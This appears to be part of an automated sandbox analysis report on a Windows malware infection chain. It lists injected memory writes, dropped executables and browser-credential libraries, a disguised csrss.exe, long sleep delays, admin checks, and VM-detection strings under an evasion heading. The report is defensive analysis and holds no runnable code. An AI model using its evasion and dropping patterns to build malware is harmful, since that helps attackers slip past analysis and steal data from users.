                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 75950230 value: E9 DA FD 75 8B Jump to behavior
                Source: unknownNetwork traffic detected: HTTP traffic on port 2222 -> 63177
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,18_2_00423C1C
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004241EC IsIconic,SetActiveWindow,SetFocus,18_2_004241EC
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004241A4 IsIconic,SetActiveWindow,18_2_004241A4
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,18_2_00418394
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,18_2_0042286C
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow,18_2_004833BC
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004175A8 IsIconic,GetCapture,18_2_004175A8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00417CDE IsIconic,SetWindowPos,18_2_00417CDE
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,18_2_00417CE0
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,18_2_0041F128
                Source: C:\Users\user\AppData\Local\Temp\93B.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\S23UhdW5DH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\rghwvveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: rghwvve, 00000006.00000002.2411410470.00000000005DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKY
                Source: C:\Users\user\AppData\Local\Temp\356F.exeMemory allocated: 1F00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\356F.exeMemory allocated: 3D10000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\356F.exeMemory allocated: 1F30000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\356F.exeMemory allocated: 6D90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\356F.exeMemory allocated: 7D90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\93B.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\Temp\356F.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 357
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1921
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 916
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2345
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 686
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 657
                Source: C:\Users\user\AppData\Local\Temp\572.exeWindow / User API: threadDelayed 1389
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeWindow / User API: threadDelayed 3009
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1381
                Source: C:\ProgramData\Drivers\csrss.exeWindow / User API: threadDelayed 8740
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_RegDLL.tmp
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1P6UB.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-GIJA5.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbis-0.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\zlib1.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-HCHL2.tmp
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss46EF.tmp\INetC.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\avcodec-58.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libwinpthread-1.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_setup64.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\avutil-56.dll (copy)
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1199.dll
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_isdecmp.dll
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-C4TNB.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\SDL2.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\ProgramData\softokn3.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libogg-0.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-399KA.tmp
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libgcc_s_dw2-1.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libbz2-1.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\ProgramData\nss3.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJL2N.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libiconv-2.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-0PI80.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJ17E.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\avformat-58.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-F43KE.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\swresample-3.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-OFQS5.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_iscrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_shfoldr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-S9GPV.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\unins000.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-A87KG.tmp
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-VN2OC.tmpJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\66E0.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbisenc-2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1HD49.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-13K5P.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeEvasive API call chain: GetSystemTime,DecisionNodes
                Source: C:\Users\user\AppData\Local\Temp\572.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_9-965
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-4426
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpAPI coverage: 7.6 %
                Source: C:\Windows\explorer.exe TID: 2848Thread sleep time: -192100s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 3268Thread sleep time: -91600s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2792Thread sleep time: -32800s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2848Thread sleep time: -234500s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exe TID: 1812Thread sleep time: -138900s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exe TID: 5728Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exe TID: 6012Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\356F.exe TID: 3636Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe TID: 3960Thread sleep count: 3009 > 30
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe TID: 3960Thread sleep time: -6018000s >= -30000s
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe TID: 2168Thread sleep count: 88 > 30
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe TID: 2168Thread sleep time: -5280000s >= -30000s
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe TID: 3960Thread sleep count: 58 > 30
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe TID: 3960Thread sleep time: -116000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3840Thread sleep count: 1381 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2544Thread sleep count: 202 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1780Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep time: -922337203685477s >= -30000s
                Source: C:\ProgramData\Drivers\csrss.exe TID: 5344Thread sleep count: 8740 > 30
                Source: C:\ProgramData\Drivers\csrss.exe TID: 5344Thread sleep time: -874000s >= -30000s
                Source: C:\ProgramData\Drivers\csrss.exe TID: 5344Thread sleep count: 199 > 30
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exe TID: 7160Thread sleep time: -31000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\93B.exeFile opened: PHYSICALDRIVE0
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeLast function: Thread delayed
                Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,18_2_00464048
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,18_2_004644C4
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00452A4C FindFirstFileA,GetLastError,18_2_00452A4C
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,18_2_00462ABC
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,18_2_004751F8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,18_2_00497A74
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,17_2_00409B30
                Source: C:\Users\user\AppData\Local\Temp\93B.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\Temp\356F.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeThread delayed: delay time: 60000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: explorer.exe, 00000002.00000000.2124664252.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
                Source: explorer.exe, 00000002.00000000.2125091063.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
                Source: explorer.exe, 00000002.00000000.2121587581.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2128556080.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
                Source: explorer.exe, 00000002.00000000.2124664252.000000000978C000.00000004.00000001.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2450711514.0000000001133000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000002.2647046758.0000000001135000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2405264297.000000000113A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 572.exe, 00000009.00000003.2470228405.0000000003622000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2481604946.00000000038C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: 572.exe, 00000009.00000003.2644593262.0000000003F6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
                Source: 572.exe, 00000009.00000003.3371455222.000000000626F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCQ+Mgq8T7UeC/2woYMrFlxjDMFr68VrX2WjJ7YjnLbHGfSDEn0XiQNjKrjsFj8m
                Source: explorer.exe, 00000002.00000000.2125091063.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                Source: explorer.exe, 00000002.00000000.2125091063.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000002.00000000.2124664252.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
                Source: 572.exe, 00000009.00000003.3323922869.000000000529C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: an6zYaGMDELrubWA6FhgFsrtk9CuIiIJYZhvenKIZdE2mgMRErUH3EbfjlSKpYro
                Source: 572.exe, 00000009.00000003.2470228405.0000000003622000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2468189486.00000000034D3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2481604946.00000000038C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m UmVW9JP3JpLzwoz36YtcTnDnWTf7ggvQEMuK44kS0i0
                Source: 572.exe, 00000009.00000003.3353352059.0000000000CA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBANISBQMG9FQEmUYbqSHKCMVy6pp7Lg62kDV5bh2nFFvTob4Cf4Z3gvXv
                Source: 572.exe, 00000009.00000003.2493956741.0000000002BED000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2507355054.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2496053848.0000000002C03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >7:qEmu|Z
                Source: explorer.exe, 00000002.00000000.2124664252.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                Source: explorer.exe, 00000002.00000000.2121587581.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
                Source: 572.exe, 00000009.00000003.3353352059.0000000000CA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Fi/NaU/VvYUxcVTz4vaYs2NRFcShZgtsVKBQ39+vmcICB7VZbxFYSGTVNsAYOU0j
                Source: explorer.exe, 00000002.00000000.2127512556.000000000C24C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2125091063.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
                Source: 572.exe, 00000009.00000003.3303625742.0000000005297000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBAMpw/WCd/IDa5l0tFR8Y4cKF5IIxeWDmKPL6OSCRJ8GHgfSeF2iGu2ab
                Source: FE8B.exe, 00000007.00000002.2647046758.00000000010F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
